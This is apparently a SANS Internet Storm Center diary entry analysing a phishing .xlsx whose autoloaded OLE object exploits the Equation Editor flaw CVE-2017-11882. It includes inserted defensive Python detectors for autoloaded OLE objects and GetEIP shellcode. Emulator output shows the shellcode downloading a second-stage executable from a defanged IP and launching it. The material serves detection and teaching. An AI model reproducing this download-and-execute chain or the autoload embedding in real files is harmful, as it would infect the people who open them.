InfoSec Handlers Diary Blog – SANS Internet Storm Center
Most users will never execute a suspicious program or "executable". Besides, most of them can't be delivered directly via email: most antispam and antivirus solutions block them. But then, how can people be so easily infected?
I'll explain with the help of a file I found in a phishing campaign. The filename is "Swift23544679066.xlsx" (SHA256: 421d30c99381f9fe4295c8c33d7e7278b323821c793bbe2f45d6003536871347) and it is still unknown on VirusTotal. Here is a screenshot of the file opened in Excel:
Many Excel sheets contain VBA or legacy Excel 4 macros, but here... nothing! Anyway, let's have a look at potential OLE content:
remnux@remnux:/MalwareZoo/20230314$ oledump.py Swift23544679066.xlsx
A: xl/embeddings/8sJz9b3F.uBx2
A1:    919012 '\x01OLE10NaTIvE'
A2:         0 'VDYic03w91Qt'
This reveals that an OLE document is embedded in the Excel sheet! Let's unzip the document and search for interesting strings:
remnux@remnux:/MalwareZoo/20230314/zip$ find . -type f -exec grep 0LE {} \; -ls
Binary file ./xl/embeddings/8sJz9b3F.uBx2 matches
1793  907 -rw-rw-r--   1 501      dialout    928768 Mar 13 20:57 ./xl/embeddings/8sJz9b3F.uBx2
This stream is referenced in worksheets/_rels/sheet1.xml.rels:
<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/8sJz9b3F.uBx2"/></Relationships>
Let's follow the ID 'rId3'. It's referenced in worksheets/sheet1.xml:
<oleObject progId="9PrBwSjsFc8A5FCXYG4ILw5IQi20z" shapeId="1506" r:id="rId3" autoLoad="true"/></oleObjects>
The OLE object will be automatically loaded when the victim opens the document!
Let's focus on this OLE stream now:
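As an added example (not code from the diary, oledump or any other tool), here is a Python triage script that walks the same chain shown above, worksheet → sheet .rels → embedded part, and flags every <oleObject> together with its autoLoad value and whether the embedded part starts with the OLE2 compound-file signature. The workbook it parses is constructed in build_sample() to mirror the quoted XML (the progId, rId3 and 8sJz9b3F.uBx2 values come from the page; the embedded part is a bare header, not the real payload).

```python
import io
import posixpath
import zipfile
import xml.etree.ElementTree as ET

OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
NS_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # OLE2 compound file signature

def find_ole_objects(xlsx_bytes):
    """List (sheet, embedded part, autoLoad, looks like OLE2) for every <oleObject> in a workbook."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as z:
        names = set(z.namelist())
        sheets = sorted(n for n in names if n.startswith("xl/worksheets/sheet") and n.endswith(".xml"))
        for sheet in sheets:
            # Map relationship ids (rId3 ...) to their target, from the sheet's own .rels part
            rels_name = sheet.replace("worksheets/", "worksheets/_rels/") + ".rels"
            targets = {}
            if rels_name in names:
                for rel in ET.fromstring(z.read(rels_name)):
                    if rel.get("Type") == OLE_REL:
                        targets[rel.get("Id")] = rel.get("Target")
            for el in ET.fromstring(z.read(sheet)).iter():
                if el.tag.rsplit("}", 1)[-1] != "oleObject":
                    continue
                target = targets.get(el.get("{%s}id" % NS_R))
                if target is None:
                    continue
                # "../embeddings/x" is relative to xl/worksheets/, so normalise it to a zip member name
                part = posixpath.normpath(posixpath.join(posixpath.dirname(sheet), target))
                is_cfb = part in names and z.read(part)[:8] == CFB_MAGIC
                hits.append((sheet, part, el.get("autoLoad") == "true", is_cfb))
    return hits

def build_sample():
    """Constructed workbook that mirrors the rels/oleObject layout quoted in the diary (not the real sample)."""
    rels = ('<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId3" Type="%s" Target="../embeddings/8sJz9b3F.uBx2"/></Relationships>' % OLE_REL)
    sheet = ('<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="%s">'
             '<oleObjects><oleObject progId="9PrBwSjsFc8A5FCXYG4ILw5IQi20z" shapeId="1506" r:id="rId3" '
             'autoLoad="true"/></oleObjects></worksheet>' % NS_R)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("xl/worksheets/sheet1.xml", sheet)
        z.writestr("xl/worksheets/_rels/sheet1.xml.rels", rels)
        z.writestr("xl/embeddings/8sJz9b3F.uBx2", CFB_MAGIC + b"\x00" * 24)  # header only, no payload
    return buf.getvalue()
```

Running find_ole_objects() on a real .xlsx returns one tuple per embedded OLE object; an autoLoad of True combined with an OLE2 part is exactly the combination this diary describes.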
remnux@remnux:/MalwareZoo/20230314$ oledump.py Swift23544679066.xlsx -s A1 -a|head -20
00000000: 38 2B 7B 05 03 EE 69 DF B3 B1 01 08 AC BE B8 C3  8+{...i.........
00000010: 42 BA FF F7 D0 8B 30 8B 0E BB B6 8B 9B 83 81 C3  B.....0.........
00000020: FA DB AA 7C 8B 3B 51 FF D7 05 6F 4E 44 17 05 93  ...|.;Q...oND...
00000030: B2 BB E8 FF E0 64 37 33 D2 A3 80 04 42 00 C7 17  .....d73....B...
00000040: A9 EA 7C 40 45 85 4B 40 BD F2 58 8A 12 33 9A FB  ..|@E.K@..X..3..
00000050: 96 EE 49 37 5E 3A 8F 2C 46 46 9D 71 54 64 B7 6F  ..I7^:.,FF.qTd.o
00000060: 16 DA DB 73 8E 71 CF 62 8B C6 F9 5E 9D 39 DC B3  ...s.q.b...^.9..
00000070: 88 79 BB FC 41 2F 35 08 88 98 1E 4B 13 30 C3 A5  .y..A/5....K.0..
00000080: D2 B6 B5 55 D8 A5 AB FB D8 E6 C6 E0 56 6D AD FA  ...U........Vm..
00000090: 85 FB D3 60 BC 1C 6D A9 BF 41 40 49 1B 06 F2 23  ...`..m..A@I...#
000000A0: DD 6C 88 26 6C A8 18 55 3D 5F 01 02 B1 4E 97 10  .l.&l..U=_...N..
000000B0: DF C8 2B 22 0F 14 34 ED 9B 7A A8 9D 96 AD D5 05  ..+"..4..z......
000000C0: DD 34 16 9D FD 17 D0 E2 FA 94 24 24 05 EC 2D 6B  .4........$$..-k
000000D0: 8E 07 A8 F2 D7 3A 08 6B 6B 51 B5 E0 0A 04 FA 9C  .....:.kkQ......
000000E0: 9C A0 62 E8 19 20 99 D8 F4 3F 7F A5 0E 6C 7E B7  ..b.. ...?...l~.
000000F0: 32 B3 EE F7 1C CC EE E9 A6 A6 16 28 E5 74 F6 EE  2..........(.t..
00000100: 08 98 B8 27 B6 07 E9 9B 01 00 00 F2 98 B8 8A 09  ...'............
00000110: 04 54 13 DA 0A FF 45 1A 38 68 5C 7F 4F DC EB 00  .T....E.8h\.O...
00000120: 85 93 1C 1F C2 E1 E7 1C E4 84 5E 3C FC DD E3 0E  ..........^<....
00000130: 8D 30 6D 9A D5 E3 C7 B8 FD C7 D1 3B 69 48 BE 3E  .0m........;iH.>
We probably have a shellcode here! How to detect this? Remember that a shellcode is like a "naked" program: it lacks a lot of useful information present in a regular executable or PE file. To be executed successfully, it must know two important pieces of information:
- Where is it located in memory?
- How to resolve API calls? (to call them and perform malicious actions)
To solve the first problem, many shellcodes perform a technique called "GetEIP". EIP is the register that contains the address of the next instruction to be executed by the CPU. There is a simple way to detect how "GetEIP" is implemented. Let's extract the stream containing the shellcode and use Didier's tool xorsearch[1]:
remnux@remnux:/MalwareZoo/20230314$ oledump.py Swift23544679066.xlsx -s A1 -d >shellcode.bin
remnux@remnux:/MalwareZoo/20230314$ xorsearch -W -d 3 shellcode.bin
Found XOR 00 position 00000106: GetEIP method 3 E99B010000
Score: 10
How to interpret this output? xorsearch found a "GetEIP" method at offset 106 in the payload we extracted from the OLE stream. We are now ready to inspect our shellcode and emulate it:
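Added example, not xorsearch's code: a minimal Python detector for the jmp/call/pop GetEIP idioms, plus the single-byte XOR brute force that is what xorsearch's "XOR 00" column refers to. The method numbering follows the diary's "method 3" for a near jmp (E9); methods 1 and 2 are my reading of the call-$+5 and short-jmp variants, and SAMPLE is constructed to reproduce the E9-then-call-back shape, not the real payload.

```python
import struct

POP_REG = range(0x58, 0x60)  # pop eax .. pop edi: the register receives the pushed address

def _rel32(buf, i):
    return struct.unpack_from("<i", buf, i)[0]

def find_geteip(buf):
    """Return (offset, method) for each GetEIP idiom found in raw x86 code.

    method 1: call $+5 ; pop reg                                  (E8 00 00 00 00 / 58-5F)
    method 2: jmp short fwd ; ... ; call back ; pop reg at jmp+2  (EB xx ... E8 ...)
    method 3: jmp near fwd  ; ... ; call back ; pop reg at jmp+5  (E9 xx xx xx xx ... E8 ...)
    """
    hits, n = [], len(buf)
    for i in range(n):
        op = buf[i]
        if op == 0xE8 and i + 6 <= n and buf[i + 1:i + 5] == b"\x00\x00\x00\x00" and buf[i + 5] in POP_REG:
            hits.append((i, 1))
            continue
        if op == 0xEB and i + 2 <= n:
            after, method = i + 2, 2
            target = after + struct.unpack_from("<b", buf, i + 1)[0]
        elif op == 0xE9 and i + 5 <= n:
            after, method = i + 5, 3
            target = after + _rel32(buf, i + 1)
        else:
            continue
        # the jump must land forward on a CALL whose target is the byte after the jump, and that byte must be a POP
        if after < target <= n - 5 and buf[target] == 0xE8:
            if target + 5 + _rel32(buf, target + 1) == after and buf[after] in POP_REG:
                hits.append((i, method))
    return hits

def scan_xor_keys(buf):
    """Try every single-byte XOR key and keep the ones under which a GetEIP idiom appears (key 0 = plain)."""
    found = {}
    for key in range(256):
        hits = find_geteip(bytes(b ^ key for b in buf))
        if hits:
            found[key] = hits
    return found

# Constructed sample: jmp +0x20 to a call that jumps back to 'pop esi' (method 3, the diary's E9 9B 01 00 00 shape)
SAMPLE = (b"\xE9" + struct.pack("<i", 0x20)      # 0x00: jmp 0x25
          + b"\x5E" + b"\x90" * 0x1F             # 0x05: pop esi -> esi = 0x2A, the byte after the call ; filler
          + b"\xE8" + struct.pack("<i", -37))    # 0x25: call 0x05 (pushes 0x2A, then lands on the pop)
XORED = bytes(b ^ 0x41 for b in SAMPLE)          # same sample hidden behind a one-byte XOR key
```

On the diary's shellcode.bin, find_geteip() reports (0x106, 3), the same hit xorsearch prints.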
remnux@remnux:/MalwareZoo/20230314$ scdbgc /f shellcode.bin /foff 106
Loaded e05e4 bytes from file shellcode.bin
Initialization Complete..
Max Steps: 2000000
Using base offset: 0x401000
Execution starts at file offset 106
401106 E99B010000 jmp 0x4012a6 vv
40110b F298 repne cbw
40110d B88A090454 mov eax,0x5404098a
401112 13DA adc ebx,edx
401114 0AFF or bh,bh
4014d4 GetProcAddress(ExpandEnvironmentStringsW)
40150c ExpandEnvironmentStringsW(%APPDATA%\DJB.exe, dst=12fb64, sz=104)
401520 GetProcAddress(CreateFileW)
40153c CreateFileW(C:\users\remnux\Application Data\DJB.exe) = 4
401556 LoadLibraryW(WinHttp)
40156c GetProcAddress(WinHttpOpen)
401578 WinHttpOpen(, 0, , , 0) = 29
401590 GetProcAddress(WinHttpConnect)
4015bb WinHttpConnect(29, 109[.]206[.]240[.]64 (40159a) , 50, 0) = 4823
4015d7 GetProcAddress(WinHttpOpenRequest)
401607 WinHttpOpenRequest(4823, GET, /KJH.exe, , , , 0) = 18be
401623 GetProcAddress(WinHttpSendRequest)
401635 WinHttpSendRequest(18be, )
401654 GetProcAddress(WinHttpReceiveResponse)
40165c WinHttpReceiveResponse()
401670 GetProcAddress(WriteFile)
401694 GetProcAddress(WinHttpQueryDataAvailable)
4016ae GetProcAddress(WinHttpReadData)
4016bb WinHttpQueryDataAvailable()
40170f GetProcAddress(CloseHandle)
401714 CloseHandle(4)
40172c GetProcAddress(GetStartupInfoW)
401736 GetStartupInfoW(12fda4)
40174d GetProcAddress(CreateProcessW)
401775 CreateProcessW( , C:\users\remnux\Application Data\DJB.exe ) = 0x1269
401789 GetProcAddress(ExitProcess)
40178d ExitProcess(0)
Stepcount 42497
We can now "read" what the shellcode will do. Remember that a shellcode must be able to resolve API calls (see the second piece of information that must be known). To achieve this, the shellcode uses the GetProcAddress() API call provided by the kernel32 DLL. We see that the shellcode resolves many interesting API calls to perform the following actions:
- Create a file DJB.exe in %APPDATA%
- Download the 2nd stage from http://109[.]206[.]240[.]64/KJH.exe
- Dump the downloaded payload into DJB.exe
- Create a new process and launch DJB.exe
Game over! This will happen without any popup or anything to click on. But wait, how can a shellcode be executed automatically by Excel just when the document is opened? Let's have a look at the process tree when you detonate the file in a sandbox:
You can see that the process created by the shellcode (DJB.exe) has EQNEDT32.EXE as its parent process. That's the Equation Editor tool provided with Microsoft Office. It suffered from a very nasty vulnerability (CVE-2017-11882) and is still exploited in the wild today! (Of course, my sandbox remains vulnerable to this exploit.)
[1] https://blog.didierstevens.com/2014/09/29/update-xorsearch-with-shellcode-detector/
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant